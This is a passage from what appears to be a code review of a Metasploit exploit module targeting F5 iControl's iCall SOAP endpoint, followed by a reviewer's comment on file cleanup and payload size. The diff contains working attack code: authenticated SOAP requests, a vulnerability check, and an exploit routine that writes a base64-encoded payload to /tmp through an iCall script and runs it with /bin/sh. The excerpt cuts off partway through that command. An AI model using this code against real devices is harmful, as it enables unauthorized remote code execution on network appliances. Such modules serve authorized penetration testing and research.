modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,322 @@
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:get_list soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
+   </soapenv:Body>
+</soapenv:Envelope>
+}
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200 and res.body =~ /\/Common\/#{handler_name}/
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def check
+    # strategy: we'll send a create_script request, with empty name:
+    # if everything is ok, the server return a 500 error saying it doesn't like empty names
+    # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
+    # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
+    # any other response is considered not vulnerable
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <scr:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item></item></scripts>
+         <definitions xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item></item></definitions>
+      </scr:create>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 500 and res.body =~ /path is empty/
+      return Exploit::CheckCode::Appears
+    elsif res and res.code == 401
+        print_error('401 Unauthorized')
+        return Exploit::CheckCode::Unknown
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    # phase 1: create iCall script to create file with payload, execute it and remove it.
+    filepath = '/tmp/'
+    filename = Rex::Text.rand_text_alpha_lower(5)
+    dest_file = filepath + filename
+    scriptname = Rex::Text.rand_text_alpha_lower(5)
+    print_status('Uploading payload...')
+
+    cmd = %Q@if { ! [file exists #{dest_file}]} { exec /bin/sh -c "echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file};@ +
```

Comment:
Unknown about Filedropper.  It looks like it'll throw that error if it the file that Filedropper was supposed to delete  wasn't there.  Is your payload still removing itself?  That may be the issue.  Regarding that odd output, no idea where that is coming from.

For payload size, I'm not sure if there is a recommended way, or even if what I'm suggesting you prevent against is even something we need to consider, but you could do it in `setup`:

```
def setup
  fail "Payload #{datastore['PAYLOAD']} is too big" if payload.encoded.size > SOME_LIMIT
end
```